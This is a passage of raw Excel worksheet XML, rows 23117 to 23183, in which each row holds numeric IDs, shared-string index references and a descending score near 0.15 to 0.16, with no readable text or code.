    </row>
    <row r="23117" ht="15.75" customHeight="1">
      <c r="A23117" s="1">
        <v>11670.0</v>
      </c>
      <c r="B23117" s="2">
        <v>2.3377949E7</v>
      </c>
      <c r="C23117" s="2" t="s">
        <v>22317</v>
      </c>
      <c r="D23117" s="2">
        <v>1.0</v>
      </c>
      <c r="E23117" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23117" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="23118" ht="15.75" customHeight="1">
      <c r="A23118" s="1">
        <v>22547.0</v>
      </c>
      <c r="B23118" s="2">
        <v>3812354.0</v>
      </c>
      <c r="C23118" s="2" t="s">
        <v>22318</v>
      </c>
      <c r="D23118" s="2">
        <v>1.0</v>
      </c>
      <c r="E23118" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23118" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="23119" ht="15.75" customHeight="1">
      <c r="A23119" s="1">
        <v>28874.0</v>
      </c>
      <c r="B23119" s="2">
        <v>2.9143506E7</v>
      </c>
      <c r="C23119" s="2" t="s">
        <v>22319</v>
      </c>
      <c r="D23119" s="2">
        <v>1.0</v>
      </c>
      <c r="E23119" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23119" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="23120" ht="15.75" customHeight="1">
      <c r="A23120" s="1">
        <v>30002.0</v>
      </c>
      <c r="B23120" s="2">
        <v>3612938.0</v>
      </c>
      <c r="C23120" s="2" t="s">
        <v>22320</v>
      </c>
      <c r="D23120" s="2">
        <v>1.0</v>
      </c>
      <c r="E23120" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23120" s="2">
        <v>0.1613756613756614</v>
      </c>
    </row>
    <row r="23121" ht="15.75" customHeight="1">
      <c r="A23121" s="1">
        <v>30882.0</v>
      </c>
      <c r="B23121" s="2">
        <v>4.6365208E7</v>
      </c>
      <c r="C23121" s="2" t="s">
        <v>22321</v>
      </c>
      <c r="D23121" s="2">
        <v>1.0</v>
      </c>
      <c r="E23121" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23121" s="2">
        <v>0.1612021857923497</v>
      </c>
    </row>
    <row r="23122" ht="15.75" customHeight="1">
      <c r="A23122" s="1">
        <v>24474.0</v>
      </c>
      <c r="B23122" s="2">
        <v>1.1032353E7</v>
      </c>
      <c r="C23122" s="2" t="s">
        <v>22322</v>
      </c>
      <c r="D23122" s="2">
        <v>1.0</v>
      </c>
      <c r="E23122" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23122" s="2">
        <v>0.1610169491525424</v>
      </c>
    </row>
    <row r="23123" ht="15.75" customHeight="1">
      <c r="A23123" s="1">
        <v>20403.0</v>
      </c>
      <c r="B23123" s="2">
        <v>1.2199269E7</v>
      </c>
      <c r="C23123" s="2" t="s">
        <v>22323</v>
      </c>
      <c r="D23123" s="2">
        <v>1.0</v>
      </c>
      <c r="E23123" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23123" s="2">
        <v>0.1609477124183007</v>
      </c>
    </row>
    <row r="23124" ht="15.75" customHeight="1">
      <c r="A23124" s="1">
        <v>20677.0</v>
      </c>
      <c r="B23124" s="2">
        <v>1.4425005E7</v>
      </c>
      <c r="C23124" s="2" t="s">
        <v>22324</v>
      </c>
      <c r="D23124" s="2">
        <v>1.0</v>
      </c>
      <c r="E23124" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23124" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="23125" ht="15.75" customHeight="1">
      <c r="A23125" s="1">
        <v>20896.0</v>
      </c>
      <c r="B23125" s="2">
        <v>1.6230637E7</v>
      </c>
      <c r="C23125" s="2" t="s">
        <v>22325</v>
      </c>
      <c r="D23125" s="2">
        <v>1.0</v>
      </c>
      <c r="E23125" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23125" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="23126" ht="15.75" customHeight="1">
      <c r="A23126" s="1">
        <v>26059.0</v>
      </c>
      <c r="B23126" s="2">
        <v>1.5535828E7</v>
      </c>
      <c r="C23126" s="2" t="s">
        <v>22326</v>
      </c>
      <c r="D23126" s="2">
        <v>1.0</v>
      </c>
      <c r="E23126" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23126" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="23127" ht="15.75" customHeight="1">
      <c r="A23127" s="1">
        <v>26194.0</v>
      </c>
      <c r="B23127" s="2">
        <v>1.6230636E7</v>
      </c>
      <c r="C23127" s="2" t="s">
        <v>22325</v>
      </c>
      <c r="D23127" s="2">
        <v>1.0</v>
      </c>
      <c r="E23127" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23127" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="23128" ht="15.75" customHeight="1">
      <c r="A23128" s="1">
        <v>33955.0</v>
      </c>
      <c r="B23128" s="2">
        <v>9306583.0</v>
      </c>
      <c r="C23128" s="2" t="s">
        <v>22327</v>
      </c>
      <c r="D23128" s="2">
        <v>1.0</v>
      </c>
      <c r="E23128" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23128" s="2">
        <v>0.1608187134502925</v>
      </c>
    </row>
    <row r="23129" ht="15.75" customHeight="1">
      <c r="A23129" s="1">
        <v>31134.0</v>
      </c>
      <c r="B23129" s="2">
        <v>4889824.0</v>
      </c>
      <c r="C23129" s="2" t="s">
        <v>22328</v>
      </c>
      <c r="D23129" s="2">
        <v>1.0</v>
      </c>
      <c r="E23129" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23129" s="2">
        <v>0.1607407407407408</v>
      </c>
    </row>
    <row r="23130" ht="15.75" customHeight="1">
      <c r="A23130" s="1">
        <v>29619.0</v>
      </c>
      <c r="B23130" s="2">
        <v>3.3652412E7</v>
      </c>
      <c r="C23130" s="2" t="s">
        <v>22329</v>
      </c>
      <c r="D23130" s="2">
        <v>1.0</v>
      </c>
      <c r="E23130" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23130" s="2">
        <v>0.1602254428341385</v>
      </c>
    </row>
    <row r="23131" ht="15.75" customHeight="1">
      <c r="A23131" s="1">
        <v>21117.0</v>
      </c>
      <c r="B23131" s="2">
        <v>1.8263343E7</v>
      </c>
      <c r="C23131" s="2" t="s">
        <v>22295</v>
      </c>
      <c r="D23131" s="2">
        <v>1.0</v>
      </c>
      <c r="E23131" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23131" s="2">
        <v>0.1600331674958541</v>
      </c>
    </row>
    <row r="23132" ht="15.75" customHeight="1">
      <c r="A23132" s="1">
        <v>22743.0</v>
      </c>
      <c r="B23132" s="2">
        <v>4.417699E7</v>
      </c>
      <c r="C23132" s="2" t="s">
        <v>22330</v>
      </c>
      <c r="D23132" s="2">
        <v>1.0</v>
      </c>
      <c r="E23132" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23132" s="2">
        <v>0.1599616858237549</v>
      </c>
    </row>
    <row r="23133" ht="15.75" customHeight="1">
      <c r="A23133" s="1">
        <v>20623.0</v>
      </c>
      <c r="B23133" s="2">
        <v>1.4048033E7</v>
      </c>
      <c r="C23133" s="2" t="s">
        <v>22331</v>
      </c>
      <c r="D23133" s="2">
        <v>1.0</v>
      </c>
      <c r="E23133" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23133" s="2">
        <v>0.1597222222222223</v>
      </c>
    </row>
    <row r="23134" ht="15.75" customHeight="1">
      <c r="A23134" s="1">
        <v>32102.0</v>
      </c>
      <c r="B23134" s="2">
        <v>5404212.0</v>
      </c>
      <c r="C23134" s="2" t="s">
        <v>22332</v>
      </c>
      <c r="D23134" s="2">
        <v>1.0</v>
      </c>
      <c r="E23134" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23134" s="2">
        <v>0.1597222222222223</v>
      </c>
    </row>
    <row r="23135" ht="15.75" customHeight="1">
      <c r="A23135" s="1">
        <v>28420.0</v>
      </c>
      <c r="B23135" s="2">
        <v>2.63896E7</v>
      </c>
      <c r="C23135" s="2" t="s">
        <v>22333</v>
      </c>
      <c r="D23135" s="2">
        <v>1.0</v>
      </c>
      <c r="E23135" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23135" s="2">
        <v>0.1595238095238095</v>
      </c>
    </row>
    <row r="23136" ht="15.75" customHeight="1">
      <c r="A23136" s="1">
        <v>24126.0</v>
      </c>
      <c r="B23136" s="2">
        <v>1.0012674E7</v>
      </c>
      <c r="C23136" s="2" t="s">
        <v>22334</v>
      </c>
      <c r="D23136" s="2">
        <v>1.0</v>
      </c>
      <c r="E23136" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23136" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="23137" ht="15.75" customHeight="1">
      <c r="A23137" s="1">
        <v>15336.0</v>
      </c>
      <c r="B23137" s="2">
        <v>4.259911E7</v>
      </c>
      <c r="C23137" s="2" t="s">
        <v>22335</v>
      </c>
      <c r="D23137" s="2">
        <v>1.0</v>
      </c>
      <c r="E23137" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23137" s="2">
        <v>0.1586151368760065</v>
      </c>
    </row>
    <row r="23138" ht="15.75" customHeight="1">
      <c r="A23138" s="1">
        <v>27722.0</v>
      </c>
      <c r="B23138" s="2">
        <v>2.3062575E7</v>
      </c>
      <c r="C23138" s="2" t="s">
        <v>22336</v>
      </c>
      <c r="D23138" s="2">
        <v>1.0</v>
      </c>
      <c r="E23138" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23138" s="2">
        <v>0.1586021505376345</v>
      </c>
    </row>
    <row r="23139" ht="15.75" customHeight="1">
      <c r="A23139" s="1">
        <v>6120.0</v>
      </c>
      <c r="B23139" s="2">
        <v>4.7783372E7</v>
      </c>
      <c r="C23139" s="2" t="s">
        <v>22337</v>
      </c>
      <c r="D23139" s="2">
        <v>1.0</v>
      </c>
      <c r="E23139" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23139" s="2">
        <v>0.1584084084084084</v>
      </c>
    </row>
    <row r="23140" ht="15.75" customHeight="1">
      <c r="A23140" s="1">
        <v>22747.0</v>
      </c>
      <c r="B23140" s="2">
        <v>4.431449E7</v>
      </c>
      <c r="C23140" s="2" t="s">
        <v>22338</v>
      </c>
      <c r="D23140" s="2">
        <v>1.0</v>
      </c>
      <c r="E23140" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23140" s="2">
        <v>0.1583333333333334</v>
      </c>
    </row>
    <row r="23141" ht="15.75" customHeight="1">
      <c r="A23141" s="1">
        <v>19277.0</v>
      </c>
      <c r="B23141" s="2">
        <v>5.5161602E7</v>
      </c>
      <c r="C23141" s="2" t="s">
        <v>22339</v>
      </c>
      <c r="D23141" s="2">
        <v>1.0</v>
      </c>
      <c r="E23141" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23141" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="23142" ht="15.75" customHeight="1">
      <c r="A23142" s="1">
        <v>20241.0</v>
      </c>
      <c r="B23142" s="2">
        <v>1.091617E7</v>
      </c>
      <c r="C23142" s="2" t="s">
        <v>22340</v>
      </c>
      <c r="D23142" s="2">
        <v>1.0</v>
      </c>
      <c r="E23142" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23142" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="23143" ht="15.75" customHeight="1">
      <c r="A23143" s="1">
        <v>21497.0</v>
      </c>
      <c r="B23143" s="2">
        <v>2.3102304E7</v>
      </c>
      <c r="C23143" s="2" t="s">
        <v>22341</v>
      </c>
      <c r="D23143" s="2">
        <v>1.0</v>
      </c>
      <c r="E23143" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23143" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="23144" ht="15.75" customHeight="1">
      <c r="A23144" s="1">
        <v>21784.0</v>
      </c>
      <c r="B23144" s="2">
        <v>2.6559093E7</v>
      </c>
      <c r="C23144" s="2" t="s">
        <v>22342</v>
      </c>
      <c r="D23144" s="2">
        <v>1.0</v>
      </c>
      <c r="E23144" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23144" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="23145" ht="15.75" customHeight="1">
      <c r="A23145" s="1">
        <v>24215.0</v>
      </c>
      <c r="B23145" s="2">
        <v>1.0406361E7</v>
      </c>
      <c r="C23145" s="2" t="s">
        <v>22343</v>
      </c>
      <c r="D23145" s="2">
        <v>1.0</v>
      </c>
      <c r="E23145" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23145" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="23146" ht="15.75" customHeight="1">
      <c r="A23146" s="1">
        <v>26855.0</v>
      </c>
      <c r="B23146" s="2">
        <v>1.901786E7</v>
      </c>
      <c r="C23146" s="2" t="s">
        <v>22344</v>
      </c>
      <c r="D23146" s="2">
        <v>1.0</v>
      </c>
      <c r="E23146" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23146" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="23147" ht="15.75" customHeight="1">
      <c r="A23147" s="1">
        <v>27946.0</v>
      </c>
      <c r="B23147" s="2">
        <v>2.3846991E7</v>
      </c>
      <c r="C23147" s="2" t="s">
        <v>22345</v>
      </c>
      <c r="D23147" s="2">
        <v>1.0</v>
      </c>
      <c r="E23147" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23147" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="23148" ht="15.75" customHeight="1">
      <c r="A23148" s="1">
        <v>28447.0</v>
      </c>
      <c r="B23148" s="2">
        <v>2.6559092E7</v>
      </c>
      <c r="C23148" s="2" t="s">
        <v>22342</v>
      </c>
      <c r="D23148" s="2">
        <v>1.0</v>
      </c>
      <c r="E23148" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23148" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="23149" ht="15.75" customHeight="1">
      <c r="A23149" s="1">
        <v>29509.0</v>
      </c>
      <c r="B23149" s="2">
        <v>3.2761767E7</v>
      </c>
      <c r="C23149" s="2" t="s">
        <v>22346</v>
      </c>
      <c r="D23149" s="2">
        <v>1.0</v>
      </c>
      <c r="E23149" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23149" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="23150" ht="15.75" customHeight="1">
      <c r="A23150" s="1">
        <v>30892.0</v>
      </c>
      <c r="B23150" s="2">
        <v>4657390.0</v>
      </c>
      <c r="C23150" s="2" t="s">
        <v>22347</v>
      </c>
      <c r="D23150" s="2">
        <v>1.0</v>
      </c>
      <c r="E23150" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23150" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="23151" ht="15.75" customHeight="1">
      <c r="A23151" s="1">
        <v>31462.0</v>
      </c>
      <c r="B23151" s="2">
        <v>5.0419613E7</v>
      </c>
      <c r="C23151" s="2" t="s">
        <v>22348</v>
      </c>
      <c r="D23151" s="2">
        <v>1.0</v>
      </c>
      <c r="E23151" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23151" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="23152" ht="15.75" customHeight="1">
      <c r="A23152" s="1">
        <v>23435.0</v>
      </c>
      <c r="B23152" s="2">
        <v>5655085.0</v>
      </c>
      <c r="C23152" s="2" t="s">
        <v>22310</v>
      </c>
      <c r="D23152" s="2">
        <v>1.0</v>
      </c>
      <c r="E23152" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23152" s="2">
        <v>0.1574074074074075</v>
      </c>
    </row>
    <row r="23153" ht="15.75" customHeight="1">
      <c r="A23153" s="1">
        <v>30869.0</v>
      </c>
      <c r="B23153" s="2">
        <v>4.625055E7</v>
      </c>
      <c r="C23153" s="2" t="s">
        <v>22349</v>
      </c>
      <c r="D23153" s="2">
        <v>1.0</v>
      </c>
      <c r="E23153" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23153" s="2">
        <v>0.1574074074074074</v>
      </c>
    </row>
    <row r="23154" ht="15.75" customHeight="1">
      <c r="A23154" s="1">
        <v>23151.0</v>
      </c>
      <c r="B23154" s="2">
        <v>5.1813833E7</v>
      </c>
      <c r="C23154" s="2" t="s">
        <v>22350</v>
      </c>
      <c r="D23154" s="2">
        <v>1.0</v>
      </c>
      <c r="E23154" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23154" s="2">
        <v>0.1572504708097929</v>
      </c>
    </row>
    <row r="23155" ht="15.75" customHeight="1">
      <c r="A23155" s="1">
        <v>21157.0</v>
      </c>
      <c r="B23155" s="2">
        <v>1.8878075E7</v>
      </c>
      <c r="C23155" s="2" t="s">
        <v>22351</v>
      </c>
      <c r="D23155" s="2">
        <v>1.0</v>
      </c>
      <c r="E23155" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23155" s="2">
        <v>0.1569200779727096</v>
      </c>
    </row>
    <row r="23156" ht="15.75" customHeight="1">
      <c r="A23156" s="1">
        <v>25169.0</v>
      </c>
      <c r="B23156" s="2">
        <v>1.3103637E7</v>
      </c>
      <c r="C23156" s="2" t="s">
        <v>22352</v>
      </c>
      <c r="D23156" s="2">
        <v>1.0</v>
      </c>
      <c r="E23156" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23156" s="2">
        <v>0.1569200779727096</v>
      </c>
    </row>
    <row r="23157" ht="15.75" customHeight="1">
      <c r="A23157" s="1">
        <v>20385.0</v>
      </c>
      <c r="B23157" s="2">
        <v>1.1994735E7</v>
      </c>
      <c r="C23157" s="2" t="s">
        <v>22353</v>
      </c>
      <c r="D23157" s="2">
        <v>1.0</v>
      </c>
      <c r="E23157" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23157" s="2">
        <v>0.1565656565656566</v>
      </c>
    </row>
    <row r="23158" ht="15.75" customHeight="1">
      <c r="A23158" s="1">
        <v>32931.0</v>
      </c>
      <c r="B23158" s="2">
        <v>6432621.0</v>
      </c>
      <c r="C23158" s="2" t="s">
        <v>22354</v>
      </c>
      <c r="D23158" s="2">
        <v>1.0</v>
      </c>
      <c r="E23158" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23158" s="2">
        <v>0.1564102564102565</v>
      </c>
    </row>
    <row r="23159" ht="15.75" customHeight="1">
      <c r="A23159" s="1">
        <v>33704.0</v>
      </c>
      <c r="B23159" s="2">
        <v>8481168.0</v>
      </c>
      <c r="C23159" s="2" t="s">
        <v>22355</v>
      </c>
      <c r="D23159" s="2">
        <v>1.0</v>
      </c>
      <c r="E23159" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23159" s="2">
        <v>0.1564102564102565</v>
      </c>
    </row>
    <row r="23160" ht="15.75" customHeight="1">
      <c r="A23160" s="1">
        <v>23661.0</v>
      </c>
      <c r="B23160" s="2">
        <v>6836456.0</v>
      </c>
      <c r="C23160" s="2" t="s">
        <v>22356</v>
      </c>
      <c r="D23160" s="2">
        <v>1.0</v>
      </c>
      <c r="E23160" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23160" s="2">
        <v>0.1564102564102564</v>
      </c>
    </row>
    <row r="23161" ht="15.75" customHeight="1">
      <c r="A23161" s="1">
        <v>34153.0</v>
      </c>
      <c r="B23161" s="2">
        <v>9866170.0</v>
      </c>
      <c r="C23161" s="2" t="s">
        <v>22357</v>
      </c>
      <c r="D23161" s="2">
        <v>1.0</v>
      </c>
      <c r="E23161" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23161" s="2">
        <v>0.1563492063492064</v>
      </c>
    </row>
    <row r="23162" ht="15.75" customHeight="1">
      <c r="A23162" s="1">
        <v>24979.0</v>
      </c>
      <c r="B23162" s="2">
        <v>1.2676985E7</v>
      </c>
      <c r="C23162" s="2" t="s">
        <v>22358</v>
      </c>
      <c r="D23162" s="2">
        <v>1.0</v>
      </c>
      <c r="E23162" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23162" s="2">
        <v>0.1561302681992338</v>
      </c>
    </row>
    <row r="23163" ht="15.75" customHeight="1">
      <c r="A23163" s="1">
        <v>27753.0</v>
      </c>
      <c r="B23163" s="2">
        <v>2.3102303E7</v>
      </c>
      <c r="C23163" s="2" t="s">
        <v>22341</v>
      </c>
      <c r="D23163" s="2">
        <v>1.0</v>
      </c>
      <c r="E23163" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23163" s="2">
        <v>0.1561302681992338</v>
      </c>
    </row>
    <row r="23164" ht="15.75" customHeight="1">
      <c r="A23164" s="1">
        <v>22245.0</v>
      </c>
      <c r="B23164" s="2">
        <v>3.2761768E7</v>
      </c>
      <c r="C23164" s="2" t="s">
        <v>22346</v>
      </c>
      <c r="D23164" s="2">
        <v>1.0</v>
      </c>
      <c r="E23164" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23164" s="2">
        <v>0.1561302681992337</v>
      </c>
    </row>
    <row r="23165" ht="15.75" customHeight="1">
      <c r="A23165" s="1">
        <v>9071.0</v>
      </c>
      <c r="B23165" s="2">
        <v>5.5121804E7</v>
      </c>
      <c r="C23165" s="2" t="s">
        <v>22359</v>
      </c>
      <c r="D23165" s="2">
        <v>1.0</v>
      </c>
      <c r="E23165" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23165" s="2">
        <v>0.1557239057239058</v>
      </c>
    </row>
    <row r="23166" ht="15.75" customHeight="1">
      <c r="A23166" s="1">
        <v>23480.0</v>
      </c>
      <c r="B23166" s="2">
        <v>5.7296834E7</v>
      </c>
      <c r="C23166" s="2" t="s">
        <v>22360</v>
      </c>
      <c r="D23166" s="2">
        <v>1.0</v>
      </c>
      <c r="E23166" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23166" s="2">
        <v>0.1553819444444445</v>
      </c>
    </row>
    <row r="23167" ht="15.75" customHeight="1">
      <c r="A23167" s="1">
        <v>20637.0</v>
      </c>
      <c r="B23167" s="2">
        <v>1.4176011E7</v>
      </c>
      <c r="C23167" s="2" t="s">
        <v>22361</v>
      </c>
      <c r="D23167" s="2">
        <v>1.0</v>
      </c>
      <c r="E23167" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23167" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="23168" ht="15.75" customHeight="1">
      <c r="A23168" s="1">
        <v>22338.0</v>
      </c>
      <c r="B23168" s="2">
        <v>3.4460485E7</v>
      </c>
      <c r="C23168" s="2" t="s">
        <v>22362</v>
      </c>
      <c r="D23168" s="2">
        <v>1.0</v>
      </c>
      <c r="E23168" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23168" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="23169" ht="15.75" customHeight="1">
      <c r="A23169" s="1">
        <v>22917.0</v>
      </c>
      <c r="B23169" s="2">
        <v>4.8330948E7</v>
      </c>
      <c r="C23169" s="2" t="s">
        <v>22363</v>
      </c>
      <c r="D23169" s="2">
        <v>1.0</v>
      </c>
      <c r="E23169" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23169" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="23170" ht="15.75" customHeight="1">
      <c r="A23170" s="1">
        <v>23618.0</v>
      </c>
      <c r="B23170" s="2">
        <v>6489157.0</v>
      </c>
      <c r="C23170" s="2" t="s">
        <v>22364</v>
      </c>
      <c r="D23170" s="2">
        <v>1.0</v>
      </c>
      <c r="E23170" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23170" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="23171" ht="15.75" customHeight="1">
      <c r="A23171" s="1">
        <v>24746.0</v>
      </c>
      <c r="B23171" s="2">
        <v>1.181108E7</v>
      </c>
      <c r="C23171" s="2" t="s">
        <v>22365</v>
      </c>
      <c r="D23171" s="2">
        <v>1.0</v>
      </c>
      <c r="E23171" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23171" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="23172" ht="15.75" customHeight="1">
      <c r="A23172" s="1">
        <v>29115.0</v>
      </c>
      <c r="B23172" s="2">
        <v>3.0434068E7</v>
      </c>
      <c r="C23172" s="2" t="s">
        <v>22366</v>
      </c>
      <c r="D23172" s="2">
        <v>1.0</v>
      </c>
      <c r="E23172" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23172" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="23173" ht="15.75" customHeight="1">
      <c r="A23173" s="1">
        <v>33599.0</v>
      </c>
      <c r="B23173" s="2">
        <v>8339037.0</v>
      </c>
      <c r="C23173" s="2" t="s">
        <v>22367</v>
      </c>
      <c r="D23173" s="2">
        <v>1.0</v>
      </c>
      <c r="E23173" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23173" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="23174" ht="15.75" customHeight="1">
      <c r="A23174" s="1">
        <v>21948.0</v>
      </c>
      <c r="B23174" s="2">
        <v>2.8794626E7</v>
      </c>
      <c r="C23174" s="2" t="s">
        <v>22368</v>
      </c>
      <c r="D23174" s="2">
        <v>1.0</v>
      </c>
      <c r="E23174" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23174" s="2">
        <v>0.1550179211469535</v>
      </c>
    </row>
    <row r="23175" ht="15.75" customHeight="1">
      <c r="A23175" s="1">
        <v>22574.0</v>
      </c>
      <c r="B23175" s="2">
        <v>3.8647857E7</v>
      </c>
      <c r="C23175" s="2" t="s">
        <v>22369</v>
      </c>
      <c r="D23175" s="2">
        <v>1.0</v>
      </c>
      <c r="E23175" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23175" s="2">
        <v>0.1550179211469535</v>
      </c>
    </row>
    <row r="23176" ht="15.75" customHeight="1">
      <c r="A23176" s="1">
        <v>24477.0</v>
      </c>
      <c r="B23176" s="2">
        <v>1.1033555E7</v>
      </c>
      <c r="C23176" s="2" t="s">
        <v>22370</v>
      </c>
      <c r="D23176" s="2">
        <v>1.0</v>
      </c>
      <c r="E23176" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23176" s="2">
        <v>0.1550179211469535</v>
      </c>
    </row>
    <row r="23177" ht="15.75" customHeight="1">
      <c r="A23177" s="1">
        <v>25049.0</v>
      </c>
      <c r="B23177" s="2">
        <v>1.2866302E7</v>
      </c>
      <c r="C23177" s="2" t="s">
        <v>22371</v>
      </c>
      <c r="D23177" s="2">
        <v>1.0</v>
      </c>
      <c r="E23177" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23177" s="2">
        <v>0.1550179211469535</v>
      </c>
    </row>
    <row r="23178" ht="15.75" customHeight="1">
      <c r="A23178" s="1">
        <v>32695.0</v>
      </c>
      <c r="B23178" s="2">
        <v>5953811.0</v>
      </c>
      <c r="C23178" s="2" t="s">
        <v>22372</v>
      </c>
      <c r="D23178" s="2">
        <v>1.0</v>
      </c>
      <c r="E23178" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23178" s="2">
        <v>0.1550179211469535</v>
      </c>
    </row>
    <row r="23179" ht="15.75" customHeight="1">
      <c r="A23179" s="1">
        <v>22494.0</v>
      </c>
      <c r="B23179" s="2">
        <v>3.7136152E7</v>
      </c>
      <c r="C23179" s="2" t="s">
        <v>22373</v>
      </c>
      <c r="D23179" s="2">
        <v>1.0</v>
      </c>
      <c r="E23179" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23179" s="2">
        <v>0.1549707602339182</v>
      </c>
    </row>
    <row r="23180" ht="15.75" customHeight="1">
      <c r="A23180" s="1">
        <v>21183.0</v>
      </c>
      <c r="B23180" s="2">
        <v>1.920019E7</v>
      </c>
      <c r="C23180" s="2" t="s">
        <v>22374</v>
      </c>
      <c r="D23180" s="2">
        <v>1.0</v>
      </c>
      <c r="E23180" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23180" s="2">
        <v>0.1547008547008547</v>
      </c>
    </row>
    <row r="23181" ht="15.75" customHeight="1">
      <c r="A23181" s="1">
        <v>21762.0</v>
      </c>
      <c r="B23181" s="2">
        <v>2.622322E7</v>
      </c>
      <c r="C23181" s="2" t="s">
        <v>22375</v>
      </c>
      <c r="D23181" s="2">
        <v>1.0</v>
      </c>
      <c r="E23181" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23181" s="2">
        <v>0.1547008547008547</v>
      </c>
    </row>
    <row r="23182" ht="15.75" customHeight="1">
      <c r="A23182" s="1">
        <v>27902.0</v>
      </c>
      <c r="B23182" s="2">
        <v>2.3676884E7</v>
      </c>
      <c r="C23182" s="5" t="s">
        <v>22376</v>
      </c>
      <c r="D23182" s="2">
        <v>1.0</v>
      </c>
      <c r="E23182" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23182" s="2">
        <v>0.1547008547008547</v>
      </c>
    </row>
    <row r="23183" ht="15.75" customHeight="1">
      <c r="A23183" s="1">
        <v>31060.0</v>
      </c>
      <c r="B23183" s="2">
        <v>4.8017046E7</v>
      </c>
      <c r="C23183" s="2" t="s">
        <v>22377</v>
      </c>
      <c r="D23183" s="2">
        <v>1.0</v>
      </c>
      <c r="E23183" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23183" s="2">
        <v>0.1547008547008547</v>
      </c>
    </row>
    <row r="23184" ht="15.75" customHeight="1">
